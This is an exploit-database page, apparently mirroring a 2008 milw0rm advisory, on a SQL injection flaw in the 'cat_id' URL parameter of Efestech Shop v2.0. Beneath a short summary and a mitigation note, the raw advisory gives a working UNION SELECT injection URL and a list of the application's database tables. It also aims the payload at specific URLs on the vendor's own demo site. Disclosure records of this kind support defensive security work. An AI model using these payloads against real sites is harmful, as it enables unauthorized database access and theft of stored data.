header-logo
Suggest Exploit
vendor:
Efestech Shop
by:
Dr.Kacak
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Efestech Shop
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: a:efestech:efestech_shop:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Efestech Shop v2.0 Sql Injection Vuln

Efestech Shop v2.0 is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database. The vulnerable parameter is 'cat_id' which is located in the URL. An attacker can inject malicious SQL code into the parameter to gain access to the database. The vulnerable tables are 'ayarlar', 'cat_eng', 'cat_tr', 'eng', 'lisans', 'mark_eng', 'mark_tr', 'product', 'subcat_eng', 'subcat_tr', 'tr', and 'urun_resim'.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

Title: Efestech Shop v2.0 Sql İnjection Vuln

==============================
==================================

[+] Author : Dr.Kacak
[+] Special Thankz : KnockOut And All My Friends
[+] System 0VerfL0WerZ Group & BuqX Team
[+] Mail : BuqX [at] Hotmail [dot] com

=================================================================

Script : Efestech Shop v2.0
Verz: 2.0
Download : http://www.aspindir.com/indir/5479

 

SQL attack ;

http://target.com/path/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar

Tables;

ayarlar
cat_eng
cat_tr
eng
lisans
mark_eng
mark_tr
product
subcat_eng
subcat_tr
tr
urun_resim

 

###############################################################

Example Bug Site :

http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar
http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+eng
http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+tr

# milw0rm.com [2008-07-01]